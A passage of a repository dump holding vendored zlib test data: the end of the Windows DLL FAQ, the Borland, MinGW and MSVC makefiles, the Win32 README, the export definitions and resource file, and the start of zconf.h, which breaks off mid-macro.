as long as their internal states are kept intact. The Microsoft Knowledge Base articles KB94248 "HOWTO: Use the C Run-Time" and KB140584 "HOWTO: Link with the Correct C Run-Time (CRT) Library" mention the potential problems raised by intermixing. If intermixing works for you, it's because your application and DLLs are avoiding the corruption of each of the CRTs' internal states, maybe by careful design, or maybe by fortune. Also note that linking ZLIB1.DLL to non-Microsoft CRTs, such as those provided by Borland, raises similar problems. 11. Why are you linking ZLIB1.DLL to MSVCRT.DLL? - MSVCRT.DLL exists on every Windows 95 with a new service pack installed, or with Microsoft Internet Explorer 4 or later, and on all other Windows 4.x or later (Windows 98, Windows NT 4, or later). It is freely distributable; if not present in the system, it can be downloaded from Microsoft or from other software provider for free. The fact that MSVCRT.DLL does not exist on a virgin Windows 95 is not so problematic. Windows 95 is scarcely found nowadays, Microsoft ended its support a long time ago, and many recent applications from various vendors, including Microsoft, do not even run on it. Furthermore, no serious user should run Windows 95 without a proper update installed. 12. Why are you not linking ZLIB1.DLL to <> ? - We considered and abandoned the following alternatives: * Linking ZLIB1.DLL to a static C library (LIBC.LIB, or LIBCMT.LIB) is not a good option. People are using the DLL mainly to save disk space. If you are linking your program to a static C library, you may as well consider linking zlib in statically, too. * Linking ZLIB1.DLL to CRTDLL.DLL looks appealing, because CRTDLL.DLL is present on every Win32 installation. Unfortunately, it has a series of problems: it does not work properly with Microsoft's C++ libraries, it does not provide support for 64-bit file offsets, (and so on...), and Microsoft discontinued its support a long time ago. * Linking ZLIB1.DLL to MSVCR70.DLL or MSVCR71.DLL, supplied with the Microsoft .NET platform, and Visual C++ 7.0/7.1, raises problems related to the status of ZLIB1.DLL as a system component. According to the Microsoft Knowledge Base article KB326922 "INFO: Redistribution of the Shared C Runtime Component in Visual C++ .NET", MSVCR70.DLL and MSVCR71.DLL are not supposed to function as system DLLs, because they may clash with MSVCRT.DLL. Instead, the application's installer is supposed to put these DLLs (if needed) in the application's private directory. If ZLIB1.DLL depends on a non-system runtime, it cannot function as a redistributable system component. * Linking ZLIB1.DLL to non-Microsoft runtimes, such as Borland's, or Cygwin's, raises problems related to the reliable presence of these runtimes on Win32 systems. It's easier to let the DLL build of zlib up to the people who distribute these runtimes, and who may proceed as explained in the answer to Question 14. 13. If ZLIB1.DLL cannot be linked to MSVCR70.DLL or MSVCR71.DLL, how can I build/use ZLIB1.DLL in Microsoft Visual C++ 7.0 (Visual Studio .NET) or newer? - Due to the problems explained in the Microsoft Knowledge Base article KB326922 (see the previous answer), the C runtime that comes with the VC7 environment is no longer considered a system component. That is, it should not be assumed that this runtime exists, or may be installed in a system directory. Since ZLIB1.DLL is supposed to be a system component, it may not depend on a non-system component. In order to link ZLIB1.DLL and your application to MSVCRT.DLL in VC7, you need the library of Visual C++ 6.0 or older. If you don't have this library at hand, it's probably best not to use ZLIB1.DLL. We are hoping that, in the future, Microsoft will provide a way to build applications linked to a proper system runtime, from the Visual C++ environment. Until then, you have a couple of alternatives, such as linking zlib in statically. If your application requires dynamic linking, you may proceed as explained in the answer to Question 14. 14. I need to link my own DLL build to a CRT different than MSVCRT.DLL. What can I do? - Feel free to rebuild the DLL from the zlib sources, and link it the way you want. You should, however, clearly state that your build is unofficial. You should give it a different file name, and/or install it in a private directory that can be accessed by your application only, and is not visible to the others (i.e. it's neither in the PATH, nor in the SYSTEM or SYSTEM32 directories). Otherwise, your build may clash with applications that link to the official build. For example, in Cygwin, zlib is linked to the Cygwin runtime CYGWIN1.DLL, and it is distributed under the name CYGZ.DLL. 15. May I include additional pieces of code that I find useful, link them in ZLIB1.DLL, and export them? - No. A legitimate build of ZLIB1.DLL must not include code that does not originate from the official zlib source code. But you can make your own private DLL build, under a different file name, as suggested in the previous answer. For example, zlib is a part of the VCL library, distributed with Borland Delphi and C++ Builder. The DLL build of VCL is a redistributable file, named VCLxx.DLL. 16. May I remove some functionality out of ZLIB1.DLL, by enabling macros like NO_GZCOMPRESS or NO_GZIP at compile time? - No. A legitimate build of ZLIB1.DLL must provide the complete zlib functionality, as implemented in the official zlib source code. But you can make your own private DLL build, under a different file name, as suggested in the previous answer. 17. I made my own ZLIB1.DLL build. Can I test it for compliance? - We prefer that you download the official DLL from the zlib web site. If you need something peculiar from this DLL, you can send your suggestion to the zlib mailing list. However, in case you do rebuild the DLL yourself, you can run it with the test programs found in the DLL distribution. Running these test programs is not a guarantee of compliance, but a failure can imply a detected problem. ** This document is written and maintained by Cosmin Truta ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/Makefile.bor ================================================ # Makefile for zlib # Borland C++ for Win32 # # Usage: # make -f win32/Makefile.bor # ------------ Borland C++ ------------ # Optional nonstandard preprocessor flags (e.g. -DMAX_MEM_LEVEL=7) # should be added to the environment via "set LOCAL_ZLIB=-DFOO" or # added to the declaration of LOC here: LOC = $(LOCAL_ZLIB) CC = bcc32 AS = bcc32 LD = bcc32 AR = tlib CFLAGS = -a -d -k- -O2 $(LOC) ASFLAGS = $(LOC) LDFLAGS = $(LOC) # variables ZLIB_LIB = zlib.lib OBJ1 = adler32.obj compress.obj crc32.obj deflate.obj gzclose.obj gzlib.obj gzread.obj OBJ2 = gzwrite.obj infback.obj inffast.obj inflate.obj inftrees.obj trees.obj uncompr.obj zutil.obj #OBJA = OBJP1 = +adler32.obj+compress.obj+crc32.obj+deflate.obj+gzclose.obj+gzlib.obj+gzread.obj OBJP2 = +gzwrite.obj+infback.obj+inffast.obj+inflate.obj+inftrees.obj+trees.obj+uncompr.obj+zutil.obj #OBJPA= # targets all: $(ZLIB_LIB) example.exe minigzip.exe .c.obj: $(CC) -c $(CFLAGS) $< .asm.obj: $(AS) -c $(ASFLAGS) $< adler32.obj: adler32.c zlib.h zconf.h compress.obj: compress.c zlib.h zconf.h crc32.obj: crc32.c zlib.h zconf.h crc32.h deflate.obj: deflate.c deflate.h zutil.h zlib.h zconf.h gzclose.obj: gzclose.c zlib.h zconf.h gzguts.h gzlib.obj: gzlib.c zlib.h zconf.h gzguts.h gzread.obj: gzread.c zlib.h zconf.h gzguts.h gzwrite.obj: gzwrite.c zlib.h zconf.h gzguts.h infback.obj: infback.c zutil.h zlib.h zconf.h inftrees.h inflate.h \ inffast.h inffixed.h inffast.obj: inffast.c zutil.h zlib.h zconf.h inftrees.h inflate.h \ inffast.h inflate.obj: inflate.c zutil.h zlib.h zconf.h inftrees.h inflate.h \ inffast.h inffixed.h inftrees.obj: inftrees.c zutil.h zlib.h zconf.h inftrees.h trees.obj: trees.c zutil.h zlib.h zconf.h deflate.h trees.h uncompr.obj: uncompr.c zlib.h zconf.h zutil.obj: zutil.c zutil.h zlib.h zconf.h example.obj: test/example.c zlib.h zconf.h minigzip.obj: test/minigzip.c zlib.h zconf.h # For the sake of the old Borland make, # the command line is cut to fit in the MS-DOS 128 byte limit: $(ZLIB_LIB): $(OBJ1) $(OBJ2) $(OBJA) -del $(ZLIB_LIB) $(AR) $(ZLIB_LIB) $(OBJP1) $(AR) $(ZLIB_LIB) $(OBJP2) $(AR) $(ZLIB_LIB) $(OBJPA) # testing test: example.exe minigzip.exe example echo hello world | minigzip | minigzip -d example.exe: example.obj $(ZLIB_LIB) $(LD) $(LDFLAGS) example.obj $(ZLIB_LIB) minigzip.exe: minigzip.obj $(ZLIB_LIB) $(LD) $(LDFLAGS) minigzip.obj $(ZLIB_LIB) # cleanup clean: -del $(ZLIB_LIB) -del *.obj -del *.exe -del *.tds -del zlib.bak -del foo.gz ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/Makefile.gcc ================================================ # Makefile for zlib, derived from Makefile.dj2. # Modified for mingw32 by C. Spieler, 6/16/98. # Updated for zlib 1.2.x by Christian Spieler and Cosmin Truta, Mar-2003. # Last updated: Mar 2012. # Tested under Cygwin and MinGW. # Copyright (C) 1995-2003 Jean-loup Gailly. # For conditions of distribution and use, see copyright notice in zlib.h # To compile, or to compile and test, type from the top level zlib directory: # # make -fwin32/Makefile.gcc; make test testdll -fwin32/Makefile.gcc # # To install libz.a, zconf.h and zlib.h in the system directories, type: # # make install -fwin32/Makefile.gcc # # BINARY_PATH, INCLUDE_PATH and LIBRARY_PATH must be set. # # To install the shared lib, append SHARED_MODE=1 to the make command : # # make install -fwin32/Makefile.gcc SHARED_MODE=1 # Note: # If the platform is *not* MinGW (e.g. it is Cygwin or UWIN), # the DLL name should be changed from "zlib1.dll". STATICLIB = libz.a SHAREDLIB = zlib1.dll IMPLIB = libz.dll.a # # Set to 1 if shared object needs to be installed # SHARED_MODE=0 #LOC = -DZLIB_DEBUG -g PREFIX = CC = $(PREFIX)gcc CFLAGS = $(LOC) -O3 -Wall AS = $(CC) ASFLAGS = $(LOC) -Wall LD = $(CC) LDFLAGS = $(LOC) AR = $(PREFIX)ar ARFLAGS = rcs RC = $(PREFIX)windres RCFLAGS = --define GCC_WINDRES STRIP = $(PREFIX)strip CP = cp -fp # If GNU install is available, replace $(CP) with install. INSTALL = $(CP) RM = rm -f prefix ?= /usr/local exec_prefix = $(prefix) OBJS = adler32.o compress.o crc32.o deflate.o gzclose.o gzlib.o gzread.o \ gzwrite.o infback.o inffast.o inflate.o inftrees.o trees.o uncompr.o zutil.o OBJA = all: $(STATICLIB) $(SHAREDLIB) $(IMPLIB) example.exe minigzip.exe example_d.exe minigzip_d.exe test: example.exe minigzip.exe ./example echo hello world | ./minigzip | ./minigzip -d testdll: example_d.exe minigzip_d.exe ./example_d echo hello world | ./minigzip_d | ./minigzip_d -d .c.o: $(CC) $(CFLAGS) -c -o $@ $< .S.o: $(AS) $(ASFLAGS) -c -o $@ $< $(STATICLIB): $(OBJS) $(OBJA) $(AR) $(ARFLAGS) $@ $(OBJS) $(OBJA) $(IMPLIB): $(SHAREDLIB) $(SHAREDLIB): win32/zlib.def $(OBJS) $(OBJA) zlibrc.o $(CC) -shared -Wl,--out-implib,$(IMPLIB) $(LDFLAGS) \ -o $@ win32/zlib.def $(OBJS) $(OBJA) zlibrc.o $(STRIP) $@ example.exe: example.o $(STATICLIB) $(LD) $(LDFLAGS) -o $@ example.o $(STATICLIB) $(STRIP) $@ minigzip.exe: minigzip.o $(STATICLIB) $(LD) $(LDFLAGS) -o $@ minigzip.o $(STATICLIB) $(STRIP) $@ example_d.exe: example.o $(IMPLIB) $(LD) $(LDFLAGS) -o $@ example.o $(IMPLIB) $(STRIP) $@ minigzip_d.exe: minigzip.o $(IMPLIB) $(LD) $(LDFLAGS) -o $@ minigzip.o $(IMPLIB) $(STRIP) $@ example.o: test/example.c zlib.h zconf.h $(CC) $(CFLAGS) -I. -c -o $@ test/example.c minigzip.o: test/minigzip.c zlib.h zconf.h $(CC) $(CFLAGS) -I. -c -o $@ test/minigzip.c zlibrc.o: win32/zlib1.rc $(RC) $(RCFLAGS) -o $@ win32/zlib1.rc .PHONY: install uninstall clean install: zlib.h zconf.h $(STATICLIB) $(IMPLIB) @if test -z "$(DESTDIR)$(INCLUDE_PATH)" -o -z "$(DESTDIR)$(LIBRARY_PATH)" -o -z "$(DESTDIR)$(BINARY_PATH)"; then \ echo INCLUDE_PATH, LIBRARY_PATH, and BINARY_PATH must be specified; \ exit 1; \ fi -@mkdir -p '$(DESTDIR)$(INCLUDE_PATH)' -@mkdir -p '$(DESTDIR)$(LIBRARY_PATH)' '$(DESTDIR)$(LIBRARY_PATH)'/pkgconfig -if [ "$(SHARED_MODE)" = "1" ]; then \ mkdir -p '$(DESTDIR)$(BINARY_PATH)'; \ $(INSTALL) $(SHAREDLIB) '$(DESTDIR)$(BINARY_PATH)'; \ $(INSTALL) $(IMPLIB) '$(DESTDIR)$(LIBRARY_PATH)'; \ fi -$(INSTALL) zlib.h '$(DESTDIR)$(INCLUDE_PATH)' -$(INSTALL) zconf.h '$(DESTDIR)$(INCLUDE_PATH)' -$(INSTALL) $(STATICLIB) '$(DESTDIR)$(LIBRARY_PATH)' sed \ -e 's|@prefix@|${prefix}|g' \ -e 's|@exec_prefix@|${exec_prefix}|g' \ -e 's|@libdir@|$(LIBRARY_PATH)|g' \ -e 's|@sharedlibdir@|$(LIBRARY_PATH)|g' \ -e 's|@includedir@|$(INCLUDE_PATH)|g' \ -e 's|@VERSION@|'`sed -n -e '/VERSION "/s/.*"\(.*\)".*/\1/p' zlib.h`'|g' \ zlib.pc.in > '$(DESTDIR)$(LIBRARY_PATH)'/pkgconfig/zlib.pc uninstall: -if [ "$(SHARED_MODE)" = "1" ]; then \ $(RM) '$(DESTDIR)$(BINARY_PATH)'/$(SHAREDLIB); \ $(RM) '$(DESTDIR)$(LIBRARY_PATH)'/$(IMPLIB); \ fi -$(RM) '$(DESTDIR)$(INCLUDE_PATH)'/zlib.h -$(RM) '$(DESTDIR)$(INCLUDE_PATH)'/zconf.h -$(RM) '$(DESTDIR)$(LIBRARY_PATH)'/$(STATICLIB) clean: -$(RM) $(STATICLIB) -$(RM) $(SHAREDLIB) -$(RM) $(IMPLIB) -$(RM) *.o -$(RM) *.exe -$(RM) foo.gz adler32.o: zlib.h zconf.h compress.o: zlib.h zconf.h crc32.o: crc32.h zlib.h zconf.h deflate.o: deflate.h zutil.h zlib.h zconf.h gzclose.o: zlib.h zconf.h gzguts.h gzlib.o: zlib.h zconf.h gzguts.h gzread.o: zlib.h zconf.h gzguts.h gzwrite.o: zlib.h zconf.h gzguts.h inffast.o: zutil.h zlib.h zconf.h inftrees.h inflate.h inffast.h inflate.o: zutil.h zlib.h zconf.h inftrees.h inflate.h inffast.h infback.o: zutil.h zlib.h zconf.h inftrees.h inflate.h inffast.h inftrees.o: zutil.h zlib.h zconf.h inftrees.h trees.o: deflate.h zutil.h zlib.h zconf.h trees.h uncompr.o: zlib.h zconf.h zutil.o: zutil.h zlib.h zconf.h ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/Makefile.msc ================================================ # Makefile for zlib using Microsoft (Visual) C # zlib is copyright (C) 1995-2017 Jean-loup Gailly and Mark Adler # # Usage: # nmake -f win32/Makefile.msc (standard build) # nmake -f win32/Makefile.msc LOC=-DFOO (nonstandard build) # The toplevel directory of the source tree. # TOP = . # optional build flags LOC = # variables STATICLIB = zlib.lib SHAREDLIB = zlib1.dll IMPLIB = zdll.lib CC = cl AS = ml LD = link AR = lib RC = rc CFLAGS = -nologo -MD -W3 -O2 -Oy- -Zi -Fd"zlib" $(LOC) WFLAGS = -D_CRT_SECURE_NO_DEPRECATE -D_CRT_NONSTDC_NO_DEPRECATE ASFLAGS = -coff -Zi $(LOC) LDFLAGS = -nologo -debug -incremental:no -opt:ref ARFLAGS = -nologo RCFLAGS = /dWIN32 /r OBJS = adler32.obj compress.obj crc32.obj deflate.obj gzclose.obj gzlib.obj gzread.obj \ gzwrite.obj infback.obj inflate.obj inftrees.obj inffast.obj trees.obj uncompr.obj zutil.obj OBJA = # targets all: $(STATICLIB) $(SHAREDLIB) $(IMPLIB) \ example.exe minigzip.exe example_d.exe minigzip_d.exe $(STATICLIB): $(OBJS) $(OBJA) $(AR) $(ARFLAGS) -out:$@ $(OBJS) $(OBJA) $(IMPLIB): $(SHAREDLIB) $(SHAREDLIB): $(TOP)/win32/zlib.def $(OBJS) $(OBJA) zlib1.res $(LD) $(LDFLAGS) -def:$(TOP)/win32/zlib.def -dll -implib:$(IMPLIB) \ -out:$@ -base:0x5A4C0000 $(OBJS) $(OBJA) zlib1.res if exist $@.manifest \ mt -nologo -manifest $@.manifest -outputresource:$@;2 example.exe: example.obj $(STATICLIB) $(LD) $(LDFLAGS) example.obj $(STATICLIB) if exist $@.manifest \ mt -nologo -manifest $@.manifest -outputresource:$@;1 minigzip.exe: minigzip.obj $(STATICLIB) $(LD) $(LDFLAGS) minigzip.obj $(STATICLIB) if exist $@.manifest \ mt -nologo -manifest $@.manifest -outputresource:$@;1 example_d.exe: example.obj $(IMPLIB) $(LD) $(LDFLAGS) -out:$@ example.obj $(IMPLIB) if exist $@.manifest \ mt -nologo -manifest $@.manifest -outputresource:$@;1 minigzip_d.exe: minigzip.obj $(IMPLIB) $(LD) $(LDFLAGS) -out:$@ minigzip.obj $(IMPLIB) if exist $@.manifest \ mt -nologo -manifest $@.manifest -outputresource:$@;1 {$(TOP)}.c.obj: $(CC) -c $(WFLAGS) $(CFLAGS) $< {$(TOP)/test}.c.obj: $(CC) -c -I$(TOP) $(WFLAGS) $(CFLAGS) $< {$(TOP)/contrib/masmx64}.c.obj: $(CC) -c $(WFLAGS) $(CFLAGS) $< {$(TOP)/contrib/masmx64}.asm.obj: $(AS) -c $(ASFLAGS) $< {$(TOP)/contrib/masmx86}.asm.obj: $(AS) -c $(ASFLAGS) $< adler32.obj: $(TOP)/adler32.c $(TOP)/zlib.h $(TOP)/zconf.h compress.obj: $(TOP)/compress.c $(TOP)/zlib.h $(TOP)/zconf.h crc32.obj: $(TOP)/crc32.c $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/crc32.h deflate.obj: $(TOP)/deflate.c $(TOP)/deflate.h $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h gzclose.obj: $(TOP)/gzclose.c $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/gzguts.h gzlib.obj: $(TOP)/gzlib.c $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/gzguts.h gzread.obj: $(TOP)/gzread.c $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/gzguts.h gzwrite.obj: $(TOP)/gzwrite.c $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/gzguts.h infback.obj: $(TOP)/infback.c $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/inftrees.h $(TOP)/inflate.h \ $(TOP)/inffast.h $(TOP)/inffixed.h inffast.obj: $(TOP)/inffast.c $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/inftrees.h $(TOP)/inflate.h \ $(TOP)/inffast.h inflate.obj: $(TOP)/inflate.c $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/inftrees.h $(TOP)/inflate.h \ $(TOP)/inffast.h $(TOP)/inffixed.h inftrees.obj: $(TOP)/inftrees.c $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/inftrees.h trees.obj: $(TOP)/trees.c $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/deflate.h $(TOP)/trees.h uncompr.obj: $(TOP)/uncompr.c $(TOP)/zlib.h $(TOP)/zconf.h zutil.obj: $(TOP)/zutil.c $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h gvmat64.obj: $(TOP)/contrib\masmx64\gvmat64.asm inffasx64.obj: $(TOP)/contrib\masmx64\inffasx64.asm inffas8664.obj: $(TOP)/contrib\masmx64\inffas8664.c $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h \ $(TOP)/inftrees.h $(TOP)/inflate.h $(TOP)/inffast.h inffas32.obj: $(TOP)/contrib\masmx86\inffas32.asm match686.obj: $(TOP)/contrib\masmx86\match686.asm example.obj: $(TOP)/test/example.c $(TOP)/zlib.h $(TOP)/zconf.h minigzip.obj: $(TOP)/test/minigzip.c $(TOP)/zlib.h $(TOP)/zconf.h zlib1.res: $(TOP)/win32/zlib1.rc $(RC) $(RCFLAGS) /fo$@ $(TOP)/win32/zlib1.rc # testing test: example.exe minigzip.exe example echo hello world | minigzip | minigzip -d testdll: example_d.exe minigzip_d.exe example_d echo hello world | minigzip_d | minigzip_d -d # cleanup clean: -del $(STATICLIB) -del $(SHAREDLIB) -del $(IMPLIB) -del *.obj -del *.res -del *.exp -del *.exe -del *.pdb -del *.manifest -del foo.gz ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/README-WIN32.txt ================================================ ZLIB DATA COMPRESSION LIBRARY zlib 1.3.0 is a general purpose data compression library. All the code is thread safe. The data format used by the zlib library is described by RFCs (Request for Comments) 1950 to 1952 in the files http://www.ietf.org/rfc/rfc1950.txt (zlib format), rfc1951.txt (deflate format) and rfc1952.txt (gzip format). All functions of the compression library are documented in the file zlib.h (volunteer to write man pages welcome, contact zlib@gzip.org). Two compiled examples are distributed in this package, example and minigzip. The example_d and minigzip_d flavors validate that the zlib1.dll file is working correctly. Questions about zlib should be sent to . The zlib home page is http://zlib.net/ . Before reporting a problem, please check this site to verify that you have the latest version of zlib; otherwise get the latest version and check whether the problem still exists or not. PLEASE read DLL_FAQ.txt, and the the zlib FAQ http://zlib.net/zlib_faq.html before asking for help. Manifest: The package zlib-1.3.0-win32-x86.zip will contain the following files: README-WIN32.txt This document ChangeLog Changes since previous zlib packages DLL_FAQ.txt Frequently asked questions about zlib1.dll zlib.3.pdf Documentation of this library in Adobe Acrobat format example.exe A statically-bound example (using zlib.lib, not the dll) example.pdb Symbolic information for debugging example.exe example_d.exe A zlib1.dll bound example (using zdll.lib) example_d.pdb Symbolic information for debugging example_d.exe minigzip.exe A statically-bound test program (using zlib.lib, not the dll) minigzip.pdb Symbolic information for debugging minigzip.exe minigzip_d.exe A zlib1.dll bound test program (using zdll.lib) minigzip_d.pdb Symbolic information for debugging minigzip_d.exe zlib.h Install these files into the compilers' INCLUDE path to zconf.h compile programs which use zlib.lib or zdll.lib zdll.lib Install these files into the compilers' LIB path if linking zdll.exp a compiled program to the zlib1.dll binary zlib.lib Install these files into the compilers' LIB path to link zlib zlib.pdb into compiled programs, without zlib1.dll runtime dependency (zlib.pdb provides debugging info to the compile time linker) zlib1.dll Install this binary shared library into the system PATH, or the program's runtime directory (where the .exe resides) zlib1.pdb Install in the same directory as zlib1.dll, in order to debug an application crash using WinDbg or similar tools. All .pdb files above are entirely optional, but are very useful to a developer attempting to diagnose program misbehavior or a crash. Many additional important files for developers can be found in the zlib127.zip source package available from http://zlib.net/ - review that package's README file for details. Acknowledgments: The deflate format used by zlib was defined by Phil Katz. The deflate and zlib specifications were written by L. Peter Deutsch. Thanks to all the people who reported problems and suggested various improvements in zlib; they are too numerous to cite here. Copyright notice: (C) 1995-2017 Jean-loup Gailly and Mark Adler This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. Jean-loup Gailly Mark Adler jloup@gzip.org madler@alumni.caltech.edu If you use the zlib library in a product, we would appreciate *not* receiving lengthy legal documents to sign. The sources are provided for free but without warranty of any kind. The library has been entirely written by Jean-loup Gailly and Mark Adler; it does not include third-party code. If you redistribute modified sources, we would appreciate that you include in the file ChangeLog history information documenting your changes. Please read the FAQ for more information on the distribution of modified source versions. ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/VisualC.txt ================================================ To build zlib using the Microsoft Visual C++ environment, use the appropriate project from the contrib/vstudio/ directory. ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/zlib.def ================================================ ; zlib data compression library EXPORTS ; basic functions zlibVersion deflate deflateEnd inflate inflateEnd ; advanced functions deflateSetDictionary deflateGetDictionary deflateCopy deflateReset deflateParams deflateTune deflateBound deflatePending deflatePrime deflateSetHeader inflateSetDictionary inflateGetDictionary inflateSync inflateCopy inflateReset inflateReset2 inflatePrime inflateMark inflateGetHeader inflateBack inflateBackEnd zlibCompileFlags ; utility functions compress compress2 compressBound uncompress uncompress2 gzopen gzdopen gzbuffer gzsetparams gzread gzfread gzwrite gzfwrite gzprintf gzvprintf gzputs gzgets gzputc gzgetc gzungetc gzflush gzseek gzrewind gztell gzoffset gzeof gzdirect gzclose gzclose_r gzclose_w gzerror gzclearerr ; large file functions gzopen64 gzseek64 gztell64 gzoffset64 adler32_combine64 crc32_combine64 crc32_combine_gen64 ; checksum functions adler32 adler32_z crc32 crc32_z adler32_combine crc32_combine crc32_combine_gen crc32_combine_op ; various hacks, don't look :) deflateInit_ deflateInit2_ inflateInit_ inflateInit2_ inflateBackInit_ gzgetc_ zError inflateSyncPoint get_crc_table inflateUndermine inflateValidate inflateCodesUsed inflateResetKeep deflateResetKeep gzopen_w ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/zlib1.rc ================================================ #include #include "../zlib.h" #ifdef GCC_WINDRES VS_VERSION_INFO VERSIONINFO #else VS_VERSION_INFO VERSIONINFO MOVEABLE IMPURE LOADONCALL DISCARDABLE #endif FILEVERSION ZLIB_VER_MAJOR,ZLIB_VER_MINOR,ZLIB_VER_REVISION,0 PRODUCTVERSION ZLIB_VER_MAJOR,ZLIB_VER_MINOR,ZLIB_VER_REVISION,0 FILEFLAGSMASK VS_FFI_FILEFLAGSMASK #ifdef _DEBUG FILEFLAGS 1 #else FILEFLAGS 0 #endif FILEOS VOS__WINDOWS32 FILETYPE VFT_DLL FILESUBTYPE 0 // not used BEGIN BLOCK "StringFileInfo" BEGIN BLOCK "040904E4" //language ID = U.S. English, char set = Windows, Multilingual BEGIN VALUE "FileDescription", "zlib data compression library\0" VALUE "FileVersion", ZLIB_VERSION "\0" VALUE "InternalName", "zlib1.dll\0" VALUE "LegalCopyright", "(C) 1995-2022 Jean-loup Gailly & Mark Adler\0" VALUE "OriginalFilename", "zlib1.dll\0" VALUE "ProductName", "zlib\0" VALUE "ProductVersion", ZLIB_VERSION "\0" VALUE "Comments", "For more information visit http://www.zlib.net/\0" END END BLOCK "VarFileInfo" BEGIN VALUE "Translation", 0x0409, 1252 END END ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zconf.h ================================================ /* zconf.h -- configuration of the zlib compression library * Copyright (C) 1995-2016 Jean-loup Gailly, Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* @(#) $Id$ */ #ifndef ZCONF_H #define ZCONF_H /* * If you *really* need a unique prefix for all types and library functions, * compile with -DZ_PREFIX. The "standard" zlib should be compiled without it. * Even better than compiling with -DZ_PREFIX would be to use configure to set * this permanently in zconf.h using "./configure --zprefix". */ #ifdef Z_PREFIX /* may be set to #if 1 by ./configure */ # define Z_PREFIX_SET /* all linked symbols and init macros */ # define _dist_code z__dist_code # define _length_code z__length_code # define _tr_align z__tr_align # define _tr_flush_bits z__tr_flush_bits # define _tr_flush_block z__tr_flush_block # define _tr_init z__tr_init # define _tr_stored_block z__tr_stored_block # define _tr_tally z__tr_tally # define adler32 z_adler32 # define adler32_combine z_adler32_combine # define adler32_combine64 z_adler32_combine64 # define adler32_z z_adler32_z # ifndef Z_SOLO # define compress z_compress # define compress2 z_compress2 # define compressBound z_compressBound # endif # define crc32 z_crc32 # define crc32_combine z_crc32_combine # define crc32_combine64 z_crc32_combine64 # define crc32_combine_gen z_crc32_combine_gen # define crc32_combine_gen64 z_crc32_combine_gen64 # define crc32_combine_op z_crc32_combine_op # define crc32_z z_crc32_z # define deflate z_deflate # define deflateBound z_deflateBound # define deflateCopy z_deflateCopy # define deflateEnd z_deflateEnd # define deflateGetDictionary z_deflateGetDictionary # define deflateInit z_deflateInit # define deflateInit2 z_deflateInit2 # define deflateInit2_ z_deflateInit2_ # define deflateInit_ z_deflateInit_ # define deflateParams z_deflateParams # define deflatePending z_deflatePending # define deflatePrime z_deflatePrime # define deflateReset z_deflateReset # define deflateResetKeep z_deflateResetKeep # define deflateSetDictionary z_deflateSetDictionary # define deflateSetHeader z_deflateSetHeader # define deflateTune z_deflateTune # define deflate_copyright z_deflate_copyright # define get_crc_table z_get_crc_table # ifndef Z_SOLO # define gz_error z_gz_error # define gz_intmax z_gz_intmax # define gz_strwinerror z_gz_strwinerror # define gzbuffer z_gzbuffer # define gzclearerr z_gzclearerr # define gzclose z_gzclose # define gzclose_r z_gzclose_r # define gzclose_w z_gzclose_w # define gzdirect z_gzdirect # define gzdopen z_gzdopen # define gzeof z_gzeof # define gzerror z_gzerror # define gzflush z_gzflush # define gzfread z_gzfread # define gzfwrite z_gzfwrite # define gzgetc z_gzgetc # define gzgetc_ z_gzgetc_ # define gzgets z_gzgets # define gzoffset z_gzoffset # define gzoffset64 z_gzoffset64 # define gzopen z_gzopen # define gzopen64 z_gzopen64 # ifdef _WIN32 # define gzopen_w z_gzopen_w # endif # define gzprintf z_gzprintf # define gzputc z_gzputc # define gzputs z_gzputs # define gzread z_gzread # define gzrewind z_gzrewind # define gzseek z_gzseek # define gzseek64 z_gzseek64 # define gzsetparams z_gzsetparams # define gztell z_gztell # define gztell64 z_gztell64 # define gzungetc z_gzungetc # define gzvprintf z_gzvprintf # define gzwrite z_gzwrite # endif # define inflate z_inflate # define inflateBack z_inflateBack # define inflateBackEnd z_inflateBackEnd # define inflateBackInit z_inflateBackInit # define inflateBackInit_ z_inflateBackInit_ # define inflateCodesUsed z_inflateCodesUsed # define inflateCopy z_inflateCopy # define inflateEnd z_inflateEnd # define inflateGetDictionary z_inflateGetDictionary # define inflateGetHeader z_inflateGetHeader # define inflateInit z_inflateInit # define inflateInit2 z_inflateInit2 # define inflateInit2_ z_inflateInit2_ # define inflateInit_ z_inflateInit_ # define inflateMark z_inflateMark # define inflatePrime z_inflatePrime # define inflateReset z_inflateReset # define inflateReset2 z_inflateReset2 # define inflateResetKeep z_inflateResetKeep # define inflateSetDictionary z_inflateSetDictionary # define inflateSync z_inflateSync # define inflateSyncPoint z_inflateSyncPoint # define inflateUndermine z_inflateUndermine # define inflateValidate z_inflateValidate # define inflate_copyright z_inflate_copyright # define inflate_fast z_inflate_fast # define inflate_table z_inflate_table # ifndef Z_SOLO # define uncompress 